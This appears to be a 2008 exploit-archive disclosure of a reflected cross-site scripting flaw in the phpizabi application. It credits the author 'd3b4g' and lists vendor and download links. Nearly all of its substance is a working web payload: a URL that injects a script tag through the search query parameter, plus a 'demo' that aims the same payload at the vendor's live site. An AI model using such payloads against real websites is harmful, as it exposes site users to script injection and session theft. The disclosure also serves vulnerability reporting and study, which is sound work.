++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ phpizabi Cross Site Scripting Vulnerability Discovered by d3b4g ============================================== AUTHOR : d3b4g DATE : 26 oct 2008 EMAIL : mocking@hotlism.com ##################################################### APPLICATION : phpizabi DOWNLOAD : http://www.phpizabi.net/?L=downloads.index VENDOR : http://www.phpizabi.net/ ======================================================= [+] Exploit : http://www.site,com/?L=home.search&query=%3Cscript%3Ealert(39774.531634838)%3C/script%3E [-] Demo : http://www.phpizabi.net/?L=home.search&query=%3Cscript%3Ealert(39774.531634838)%3C/script%3E